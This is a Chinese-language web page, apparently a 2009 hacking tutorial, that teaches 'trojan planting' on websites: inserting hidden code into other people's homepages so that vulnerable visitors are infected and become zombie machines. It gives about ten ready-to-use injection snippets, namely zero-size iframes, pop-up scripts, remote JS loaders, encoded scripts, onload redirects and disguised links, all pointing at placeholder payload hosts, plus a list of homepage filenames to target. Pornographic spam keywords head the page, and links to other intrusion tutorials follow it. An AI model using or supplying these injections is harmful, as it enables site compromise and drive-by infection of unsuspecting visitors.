欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

網(wǎng)頁掛馬詳細(xì)步驟教程

  發(fā)布時間:2009-04-30 13:19:33   作者:佚名   我要評論
其實(shí)很簡單的的,說到原理,就一個:就是在人家網(wǎng)站的主頁那里插入一個自己的網(wǎng)馬的頁面,等有漏洞的人查看了人家網(wǎng)站的主頁,那么他就成了你的肉雞了。 下面我介紹5種方法,我一個一個介紹 方法一:這個就是最簡單的了,只要你懂點(diǎn)html語言 把下面這段代碼插進(jìn)網(wǎng)頁中:
其實(shí)很簡單的的,說到原理,就一個:就是在人家網(wǎng)站的主頁那里插入一個自己的網(wǎng)馬的頁面,等有漏洞的人查看了人家網(wǎng)站的主頁,那么他就成了你的肉雞了。
下面我介紹5種方法,我一個一個介紹
方法一:這個就是最簡單的了,只要你懂點(diǎn)html語言
把下面這段代碼插進(jìn)網(wǎng)頁中:
<iframe src="這里換成你的網(wǎng)馬的地址" width="0" height="0" frameborder="0"></iframe>
我來插入,理論上來說插到任何地方都行,只是不要把html語言給弄亂了就行
本來沒有插進(jìn)去的頁面就是這樣,不知道網(wǎng)易那里有沒有彈出的廣告了,好我們運(yùn)行,注意到網(wǎng)頁的左下角的網(wǎng)址變化
看到左下角了吧,那里在請求www.163.com,說明我們插入進(jìn)去的頁面也運(yùn)行了,哦,還有個彈出的窗口,給我的工具攔了,我來刷新一次,看到吧
width="0" height="0" frameborder="0"就是大小高度的意思,我們把他設(shè)置為零,那我們就不能看到網(wǎng)頁的內(nèi)容了
看下一種方法,把原來插進(jìn)去的清理掉先,等下那個文件還要用
方法二:這個就是腳本
<SCRIPT language=javascript>
window.open("http://www.xxx.com/test.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
我們做網(wǎng)頁的時候就會加入很多網(wǎng)頁特效,同樣我們也可以用來打開我們的網(wǎng)馬,那么瀏覽過機(jī)子就會中我們的網(wǎng)馬了~
學(xué)過java的都知道上面一段代碼的意思了把!打開網(wǎng)站的同時也就打開了我們的http://www.xx.com/test.htm
看我們插進(jìn)去
彈出的窗口給攔了,我去掉先,還是給攔了
暈,有個窗口彈了出來,這樣子的網(wǎng)馬是不保險的……不過也不失為一種方法
呃~改成0就更大的窗口了,好,方法而已,只是介紹,下一個
方法三:
還有一點(diǎn)就是比較隱蔽的那就是使用js文件
document.write("<iframe width='0' height='0' src='http://xxxxxxx.net/mm1.htm'></iframe>");
document.write("<iframe width='0' height='0' src='http://xxxxxxx.net/mm2.htm'></iframe>");
我們沒必要掛兩個網(wǎng)馬,就寫一個好了額
剛才寫錯位置了
保存為mm.js,然后在首頁里調(diào)用js腳本
<script language="javascript" src="</script'>http://xxxxxxx.net/mm.js"></script>這個就是調(diào)用的代碼,從這里我們可以看到http://xxxxxxx.net/mm.js,說明我們的mm.js文件可以不傳到主機(jī)上,這樣可以方便我們批量管理我們掛馬,傳到我們的主頁空間上就可以了不過我這里就不傳了,就用本地的吧,運(yùn)行
左下角……調(diào)用了163的了,再刷新下,看清楚點(diǎn),OK下一種方法
方法五:
再一種代碼就是調(diào)用其他網(wǎng)頁的頁面文件,可以將下面的代碼復(fù)制,保存為HTM文件。
<frameset rows="444,0" cols="*">
<frame src="/index.htm" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="help.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>
打開這個網(wǎng)頁文件時顯示的是index.htm的內(nèi)容,而實(shí)際上還同時執(zhí)行了help.htm的代碼,大家可以對應(yīng)
自己生成的木馬頁和想調(diào)用的網(wǎng)頁來修改help.htm和index.htm,把它們改成你的文件名就可以了。
這個方法以前黑防的文章有,我就直講運(yùn)用了
我改代碼換成其他的頁面了,還是要注意頁面的左下角,出錯了,重來
看到左下角了吧,再刷新一次
看到了吧,只是太快就沒了
再說下我們掛馬的時候一般選取的頁面
我們選取用來插馬的頁面一般是網(wǎng)站的首頁
比如:index.htm、index.html、index.asp、index.aspx、index.php、index.cgi、index.jsp、default.htm、default.html default.asp default.aspx default.cgi default.jsp default.php等等,大家就自己記錄下來吧,其他頁面也可以插入,只要人家沒有打上補(bǔ)丁
一:框架掛馬
<iframe src=地址 width=0 height=0></iframe>
二:js文件掛馬
首先將以下代碼
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存為xxx.js,
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>
三:js變形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后綴
四:body掛馬
<body onload="window.location='地址';"></body>
五:隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';
六:css中掛馬
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
七:JAJA掛馬
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
八:圖片偽裝
<html>
<iframe src="網(wǎng)馬地址" height=0 width=0></iframe>
<img src="圖片地址"></center>
</html>
九:偽裝調(diào)用:
<frameset rows="444,0" cols="*">
<frame src="打開網(wǎng)頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網(wǎng)馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高級欺騙
<a href="http://www.163.com(迷惑連接地址,顯示這個地址指向木馬地址)" onMouseOver="www_163_com(); return true;"> 頁面要顯示的內(nèi)容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="網(wǎng)馬地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

相關(guān)文章

  • 最經(jīng)典的黑客入門教程(安全必備技能)

    無論那類黑客,他們最初的學(xué)習(xí)內(nèi)容都將是本部分所涉及的內(nèi)容,而且掌握的基本技能也都是一樣的。即便日后他們各自走上了不同的道路,但是所做的事情也差不多,只不過出發(fā)點(diǎn)
    2013-04-16
  • 局域網(wǎng)入侵完全版

    首先申明:   1.入侵的范圍只包括局域網(wǎng),如果在學(xué)校上,可以入侵整個校園網(wǎng);   2.能入侵的只是存在弱口令(用戶名為administrator等,密碼為空),并且開了139端口
    2009-06-09
  • 詳述入侵滲透技術(shù)

    入侵滲透涉及許多知識和技術(shù),并不是一些人用一兩招就可以搞定的。 一,踩點(diǎn) 踩點(diǎn)可以了解目標(biāo)主機(jī)和網(wǎng)絡(luò)的一些基本的安全信息,主要有; 1,管理員
    2008-10-08
  • 整人用的一個電腦重啟病毒

    這篇文章主要介紹了整人用的一個電腦重啟病毒,本文用bat文件偽造如QQ圖標(biāo)等常用軟件,導(dǎo)致點(diǎn)擊就會重啟的惡作劇腳本,需要的朋友可以參考下
    2014-10-10
  • 如何判斷電腦是否淪為“肉雞”?

    今天有網(wǎng)友問小編怎樣判斷電腦是否淪為“肉雞”,小編就來給大家盤點(diǎn)幾條電腦淪為肉雞的表現(xiàn)
    2014-08-14
  • Google 黑客搜索技巧

    站內(nèi)搜索地址為: httpwww.google.comcustomdomains=(這里寫我們要搜索的站點(diǎn),比如feelids.com) 進(jìn)去可以選擇www和feelids.com, 當(dāng)然再選我們要的站內(nèi)搜索
    2008-10-08
  • 偽黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介紹(圖)

    黑客必須要有專業(yè)的知識,豐富的經(jīng)驗。而偽黑客不需要,只需要幾個工具,掃描默認(rèn)口令、弱口令、漏洞,就能利用。
    2012-05-18
  • 教你phpMyAdmin 后臺拿webshell

    1.如何拿到登陸密碼,自己想辦法。 2.訪問 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路徑. 3.選擇一個Database.運(yùn)行以下語句. ----start cod
    2008-10-08
  • 如何正確的進(jìn)行網(wǎng)站入侵滲透測試

    入侵滲透涉及許多知識和技術(shù),并不是一些人用一兩招就可以搞定的,下面小編就為大家具體的講解如何正確的進(jìn)行網(wǎng)站入侵滲透測試,希望可以幫助到大家
    2016-10-28

最新評論